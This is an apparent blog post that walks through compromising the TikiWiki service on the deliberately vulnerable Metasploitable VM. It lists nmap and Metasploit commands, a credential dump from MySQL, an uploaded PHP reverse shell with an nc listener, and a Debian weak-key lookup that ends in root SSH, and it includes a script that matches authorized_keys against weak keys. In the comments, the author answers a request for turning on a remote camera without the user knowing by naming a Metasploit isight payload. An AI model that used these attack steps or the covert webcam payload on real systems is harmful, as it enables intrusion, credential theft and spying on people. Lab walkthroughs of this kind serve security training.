Watch video on-line: http://g0tmi1k.blip.tv/file/3826160
Download video: http://www.mediafire.com/?pr702t9cp4mlkct
Download (debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51
What is this?
This video demonstrates an attack on the TikiWiki service on the metasploitable hackable box.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to discover the database details (gaining access)
> [*] Can also use an exploit (gaining access)
> Search the database for the account information (gathering information and gaining access)
> [*] Use a web based backdoor to create shell access (remote access)
> Automate shell access via Metasploit (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> DirBuster v0.12 --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> NetCat --- on Backtrack 4 (Final)
> php-reverse-shell v1.0 --- http://pentestmonkey.net/tools/php-reverse-shell/
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) --- http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
Commands:
nmap 192.168.1.1/24
firefox 192.168.1.105
cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u http://192.168.1.105
firefox 192.168.1.105/tikiwiki
msfconsole
search tikiwiki
use admin/tikiwiki/tikidblib
setg RHOST 192.168.1.105
exploit
firefox -> www.exploit-db.com -> TikiWiki (2701)
firefox 192.168.1.105/tikiwiki/ -> 192.168.1.105/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p
show databases;
use tikiwiki195;
show tables;
select * from users_users;
select login, password from users_users;
admin admin [new password]
php-reverse-shell.php -> shell.php
kate -> shell.php -> Replace: 127.0.0.1 with 192.168.1.103 [Our IP]. Replace: 1234 with 4321.
nc -v -l -p 4321 [start the listener before requesting the shell]
http://192.168.1.105/tikiwiki/backups/shell.php [Target IP]
whoami
hostname
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
show options
exploit
ls
whoami
cat /etc/passwd
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
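The grep against rsa/2048 above looks up a single key blob by hand. The script below is an added example, not something from g0tmi1k's post or the video: it takes a copy of the target's authorized_keys, checks every key in it against a directory of pre-generated weak Debian OpenSSL keys, and prints the private key file to hand to ssh -i. It assumes the archive's layout (private key NAME sitting next to NAME.pub); the directory names, file names and base64 blobs it builds for its offline demo are constructed placeholders, not real key material.

```shell
#!/bin/sh
# Added example (not g0tmi1k's script): match an authorized_keys file against
# a directory of pre-generated weak Debian OpenSSL keys laid out like the
# rsa/2048 directory from the archive (private key NAME next to NAME.pub).
# Real use, after copying the target's authorized_keys to a local file:
#   sh weakkeys.sh authorized_keys.txt rsa/2048
# All paths and key blobs below are assumptions or constructed demo data.
set -u

# find_weak_keys AUTHORIZED_KEYS WEAK_KEY_DIR
# For each key in AUTHORIZED_KEYS whose base64 blob appears in some *.pub
# under WEAK_KEY_DIR, print "<private key path> <key comment>". Returns 0 if
# at least one key is weak, 1 otherwise. The printed path is what ssh -i takes.
find_weak_keys() {
  auth="$1"; dir="$2"; rc=1
  while read -r f1 f2 rest; do
    # Skip blank lines and comments.
    case "$f1" in ''|'#'*) continue ;; esac
    # A line is "[options] keytype base64 [comment]". If the first field is
    # not a key type it is an options field: drop it and re-split the rest.
    # (Options containing quoted spaces are not handled; fine for a lab box.)
    case "$f1" in
      ssh-rsa|ssh-dss) ;;
      *)
        set -- $f2 $rest
        [ $# -ge 1 ] || continue
        f1="$1"; f2="${2:-}"
        if [ $# -ge 2 ]; then shift 2; rest="$*"; else rest=""; fi
        ;;
    esac
    [ -n "$f2" ] || continue
    # Fixed-string search: base64 contains '+' and '/', so no regex here.
    # stdin is redirected so nothing inside the loop can eat the key file.
    hits=$(find "$dir" -name '*.pub' -exec grep -lF -- "$f2" {} + </dev/null | sort)
    [ -n "$hits" ] || continue
    rc=0
    printf '%s\n' "$hits" | while read -r pub; do
      printf '%s%s\n' "${pub%.pub}" "${rest:+ $rest}"
    done
  done < "$auth"
  return $rc
}

# make_sample DIR: build a constructed weak-key directory and authorized_keys
# under DIR so the check runs offline. The blobs are made-up placeholders.
make_sample() {
  d="$1"
  mkdir -p "$d/rsa/2048" "$d/ssh"
  for pair in "aaaa1111-1001 weakkey1" "bbbb2222-1002 weakkey2"; do
    set -- $pair
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA%s root@weak\n' "$2" > "$d/rsa/2048/$1.pub"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' '(constructed placeholder)' \
      '-----END RSA PRIVATE KEY-----' > "$d/rsa/2048/$1"
  done
  cat > "$d/ssh/authorized_keys" <<'EOF'
# constructed authorized_keys: one strong key, one weak key, one weak key with options
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstrongkey admin@strong
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAweakkey1 root@metasploitable
from="192.168.1.0/24" ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAweakkey2 backup@metasploitable
EOF
}

# Stand-alone: "sh weakkeys.sh AUTHORIZED_KEYS WEAK_KEY_DIR", or "--demo" to
# run against the constructed sample.
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp -d)
  make_sample "$tmp"
  find_weak_keys "$tmp/ssh/authorized_keys" "$tmp/rsa/2048"
  rm -rf "$tmp"
elif [ $# -eq 2 ]; then
  find_weak_keys "$1" "$2"
fi
```

On the demo data this prints the two private key paths for the weak entries and nothing for the strong one; against a real rsa/2048 directory the printed path goes straight into `ssh -i <path> root@<target>`. The same function run over your own hosts' authorized_keys files is the defensive check: any hit is a key that must be revoked.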
Notes:
Song: Orbital - Halcyon and On and On
Video length: 8:11
Capture length: 21:34
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tikiwiki.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30077-%5Bvideo%5D-metasploitable-tikiwiki.html#post167041
~g0tmi1k
Wow, you sure do know what you are doing. Do you know of any more exploits that are used rather commonly? How about turning on a remote camera without the user knowing.
@Krptodr
Thanks. (=
I know of a few - I want to work on some more though. ;) Just got a few scripts, videos and other ideas to work on first =(
Now about cameras, I've tried this one before.
In metasploit: set PAYLOAD osx/x86/isight/bind_tcp
There is also this (I haven't tried it myself):
http://securitytube.net/Rooting-a-PC-and-Monitoring-its-Webcam-Remotely-video.aspx
...and I'm also planning a tut myself on the "issue" too ;)
Thank you, for the information you have provided. I appreciate your responses. I can't wait for some more scripts. :)
@Krptodr
Thanks for the thanks!
They are on their way ;)